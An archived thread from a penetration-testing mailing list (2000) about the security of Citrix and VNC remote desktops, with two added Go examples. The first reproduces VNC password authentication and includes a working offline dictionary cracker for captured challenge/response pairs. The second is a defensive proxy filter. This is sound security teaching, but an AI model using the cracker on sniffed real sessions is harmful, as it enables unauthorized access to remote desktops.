Penetration Testing mailing list archives

Re: [PEN-TEST] Citrix (and other remote-terminal madness)


From: "Beauregard, Claude Q" <CQBeauregard () AAAMICHIGAN COM>
Date: Wed, 11 Oct 2000 09:58:46 -0400

I'm not aware of anything unique about the Citrix ICA client that identifies
it to the Citrix server. Has anyone tried to use the VNC client to access a
Citrix server?

Claude

-----Original Message-----
From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf
Of Jay Mobley
Sent: Tuesday, October 10, 2000 3:38 PM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Re: [PEN-TEST] Citrix (and other remote-terminal madness)


Keep in mind however that while VNC has plenty of options in the way of
protecting the data that is sent over the wire, its authentication
mechanisms are lacking. Passwords are limited to 8 characters, and there is
no protection against dictionary/brute force attacks, and there is a patch
out for the client that allows you to do just that. By the way, if anyone
happens to have knowledge of the patch, I never could figure out where the
code went...

-Jay Mobley
Interactive Explorers
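The authentication weakness Jay describes can be seen directly in the VNC challenge/response exchange (the "VNC Authentication" security type of the RFB protocol). The Go program below is an added example for this archive page, not code from the thread or from the VNC project. It derives the DES key the way the classic VNC client does (password cut or zero-padded to exactly 8 bytes, bit order of each byte reversed), answers a 16-byte server challenge, and then runs the offline dictionary attack an eavesdropper can mount against one captured challenge/response pair. The password "secret123" and the wordlist are constructed for the demo.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/rand"
	"fmt"
	"math/bits"
)

// vncKey turns a password into the 8-byte DES key used by VNC Authentication:
// the password is cut or zero-padded to exactly 8 bytes (anything past the
// eighth character is silently ignored), and the bit order of every byte is
// reversed, because the original VNC DES code numbers key bits from the other
// end. The reversal moves the always-zero high bit of an ASCII character into
// DES's ignored parity position, so the effective key is 8 printable characters
// and nothing more.
func vncKey(password string) []byte {
	key := make([]byte, 8)
	for i := 0; i < 8 && i < len(password); i++ {
		key[i] = bits.Reverse8(password[i])
	}
	return key
}

// vncResponse computes what the client sends back: the server's 16-byte
// random challenge encrypted as two independent DES-ECB blocks.
func vncResponse(password string, challenge []byte) ([]byte, error) {
	if len(challenge) != 16 {
		return nil, fmt.Errorf("challenge must be 16 bytes, got %d", len(challenge))
	}
	block, err := des.NewCipher(vncKey(password))
	if err != nil {
		return nil, err
	}
	resp := make([]byte, 16)
	block.Encrypt(resp[:8], challenge[:8])
	block.Encrypt(resp[8:], challenge[8:])
	return resp, nil
}

// crack is the offline dictionary attack: with one sniffed challenge and
// response, try candidates until one reproduces the response. The server is
// not involved, so it has no chance to notice or throttle the attempts.
func crack(challenge, response []byte, wordlist []string) (string, bool) {
	for _, guess := range wordlist {
		got, err := vncResponse(guess, challenge)
		if err == nil && bytes.Equal(got, response) {
			return guess, true
		}
	}
	return "", false
}

func main() {
	// Server side: a fresh 16-byte nonce per connection.
	challenge := make([]byte, 16)
	if _, err := rand.Read(challenge); err != nil {
		panic(err)
	}
	// Client side: the legitimate user answers with a 9-character password
	// (constructed for the demo).
	resp, err := vncResponse("secret123", challenge)
	if err != nil {
		panic(err)
	}
	// Attacker side: replay the captured pair against a small wordlist
	// (constructed for the demo). The 8-character entry matches, because
	// the ninth character never entered the key.
	wordlist := []string{"password", "letmein", "secret12", "hunter2"}
	pw, ok := crack(challenge, resp, wordlist)
	fmt.Printf("recovered %q (found=%v)\n", pw, ok)
}
```

Two things fall out of the code: characters beyond the eighth never reach the key, so "secret123" and "secret12" produce identical responses, and because the server keeps no state beyond the nonce it issued, nothing limits how many guesses are tried against a captured pair. In the classic protocol the practical mitigation is the one given elsewhere in this thread: keep the exchange off the wire by tunnelling it.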



-----Original Message-----
From: Dunker, Noah [mailto:NDunker () FISHNETSECURITY COM]
Sent: Tuesday, October 10, 2000 9:03 AM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Re: [PEN-TEST] Citrix (and other remote-terminal madness)


If you're looking for a graphical remote interface, you might try VNC.  The
client is cross-platform (it even works on MacOS and WinCE).  The server works
on all Windows platforms, and source is available for UNIX platforms, with
binaries available for almost all popular flavors.

It only allows keyboard and mouse.  No file transfers or anything.  On Win*,
there can be only one user at a time.  On UNIX, VNC creates extended virtual X
Window System desktops, so multiple users can be logged into the same server
at the same time...  :0, :1, :2, etc.  For silly things like Netscape,
this will probably work fine.  The Windows VNC client even supports "Full
Screen Mode" where Windows goes into the background and the remote machine
seems to be local.  It works okay over a T1, and there have been multiple
enhancements to the VNC protocol that allow for encryption, higher levels of
compression, etc., and VNC works great through a VPN or SSH tunnel.

VNC can be grabbed from http://www.uk.research.att.com/vnc/.  This version
has no encryption that I know of...  Do a search and you can probably find
others...  I typically just shove the protocol through OpenSSH.



-----Original Message-----
From: Peter Van Epp [mailto:vanepp () SFU CA]
Sent: Tuesday, October 10, 2000 10:45 AM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Re: Citrix



On Mon, 9 Oct 2000, Beauregard, Claude Q wrote:

Has anyone done any penetration regarding Citrix and Internet access as
provided by the Citrix servers to internal network resources? Even though
they are now using 128-bit encryption for the client, the hole in the
firewall is there waiting to be exploited.

Can you elaborate what you see as a hole?

Hugo.


        While I'm not the original poster, I was (and to some extent still am)
looking at this as a way to get "web" access into a secure network. My
concern is that, as I feared, the link between the client and server is
apparently a full-service link (i.e. it allows drive mounting from the server
by the client, for instance). The application I'm interested in (and which
sounds like what this person is doing) is to have the server out on the net,
subject to being broken into like all NT devices, but having nothing except
video commands going in and keystrokes coming out from the secure network.
Thus a break-in on the server doesn't compromise the internal secure network
(as long as confidential data is kept off of the Citrix server at least). The
attacker can draw obscene images on a single screen inside the secure
network, but likely (modulo bugs in the video drawing routines on the client
side, of course) can't take over the client machine and compromise the
internal network. It looks to me from what little I have found out about the
Citrix protocol that you would need an application proxy type firewall to
filter out all protocol elements other than screen draw commands in and
keystrokes out before you could do this safely. With things like file system
mounting possible, I expect that a compromise of the server could also result
in a compromise of the secure network that the client is part of by
subverting the client.
        This of course may not be possible if the protocol gets unhappy
about not being able to talk to the client except with video drawing
commands.

Peter Van Epp / Operations and Technical Support
Simon Fraser University, Burnaby, B.C. Canada
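Peter's "application proxy type firewall" idea, sketched as code. The Citrix ICA wire format is not described anywhere in this thread, so the example uses the RFB protocol spoken by VNC (the alternative proposed earlier in the thread), whose client-to-server message layouts are public. The Go program below is an added example for this archive page, not code from the thread or from any VNC implementation: it frames each RFB client message by type, forwards only keyboard, mouse, pixel-format and screen-refresh messages, drops ClientCutText (the clipboard, which is arbitrary data flowing out of the secure side), and fails closed on anything it cannot frame. The message builders and the sample stream are constructed for the demo; the 1 MiB cap on clipboard length is an assumed sanity limit, not part of the protocol.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// RFB client-to-server message types (RFB 3.x).
const (
	msgSetPixelFormat           = 0
	msgSetEncodings             = 2
	msgFramebufferUpdateRequest = 3
	msgKeyEvent                 = 4
	msgPointerEvent             = 5
	msgClientCutText            = 6
)

// allowed is the outbound policy: keystrokes, mouse, pixel format and refresh
// requests may leave the secure side; clipboard text (ClientCutText) may not.
var allowed = map[byte]bool{
	msgSetPixelFormat: true, msgSetEncodings: true,
	msgFramebufferUpdateRequest: true, msgKeyEvent: true, msgPointerEvent: true,
}

var errShort = errors.New("truncated message")

// messageLen returns the full length of the message starting at buf[0].
// A type the proxy cannot frame is an error: there is no safe way to
// resynchronise the stream past it, so the connection must be dropped.
func messageLen(buf []byte) (int, error) {
	if len(buf) == 0 {
		return 0, errShort
	}
	switch buf[0] {
	case msgSetPixelFormat:
		return 20, nil // type + 3 pad + 16-byte PIXEL_FORMAT
	case msgSetEncodings: // type + pad + u16 count + 4 bytes per encoding
		if len(buf) < 4 {
			return 0, errShort
		}
		return 4 + 4*int(binary.BigEndian.Uint16(buf[2:4])), nil
	case msgFramebufferUpdateRequest:
		return 10, nil // type + incremental + x, y, w, h
	case msgKeyEvent:
		return 8, nil // type + down + 2 pad + keysym
	case msgPointerEvent:
		return 6, nil // type + button mask + x, y
	case msgClientCutText: // type + 3 pad + u32 length + text
		if len(buf) < 8 {
			return 0, errShort
		}
		n := binary.BigEndian.Uint32(buf[4:8])
		if n > 1<<20 { // assumed sanity cap, not a protocol limit
			return 0, fmt.Errorf("cut text length %d exceeds limit", n)
		}
		return 8 + int(n), nil
	default:
		return 0, fmt.Errorf("unknown client message type %d", buf[0])
	}
}

// filterClientStream frames every message in buf and copies only the allowed
// ones to the output. It returns the forwarded bytes, the types it dropped,
// and an error if the stream could not be fully framed.
func filterClientStream(buf []byte) ([]byte, []byte, error) {
	var out, dropped []byte
	for len(buf) > 0 {
		n, err := messageLen(buf)
		if err != nil {
			return out, dropped, err
		}
		if n > len(buf) {
			return out, dropped, errShort
		}
		if allowed[buf[0]] {
			out = append(out, buf[:n]...)
		} else {
			dropped = append(dropped, buf[0])
		}
		buf = buf[n:]
	}
	return out, dropped, nil
}

// Message builders for the demo (constructed, not captured traffic).
func keyEvent(down bool, keysym uint32) []byte {
	m := make([]byte, 8)
	m[0] = msgKeyEvent
	if down {
		m[1] = 1
	}
	binary.BigEndian.PutUint32(m[4:], keysym)
	return m
}

func pointerEvent(buttons byte, x, y uint16) []byte {
	m := make([]byte, 6)
	m[0], m[1] = msgPointerEvent, buttons
	binary.BigEndian.PutUint16(m[2:], x)
	binary.BigEndian.PutUint16(m[4:], y)
	return m
}

func cutText(s string) []byte {
	m := make([]byte, 8+len(s))
	m[0] = msgClientCutText
	binary.BigEndian.PutUint32(m[4:], uint32(len(s)))
	copy(m[8:], s)
	return m
}

func main() {
	var stream []byte
	stream = append(stream, keyEvent(true, 0x61)...)         // 'a' pressed
	stream = append(stream, cutText("internal: hunter2")...) // clipboard paste
	stream = append(stream, pointerEvent(1, 100, 200)...)    // left click
	out, dropped, err := filterClientStream(stream)
	fmt.Printf("forwarded %d of %d bytes, dropped types %v, err=%v\n",
		len(out), len(stream), dropped, err)
}
```

Only the outbound (client-to-server) half is shown. The inbound half, restricting the exposed server to framebuffer updates, needs a decoder for every negotiated encoding, which is the bulk of the proxy work Peter anticipates. A filter like this also constrains only protocol messages; it does nothing about bugs in the client's drawing code, the case Peter's "modulo bugs" caveat already sets aside.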

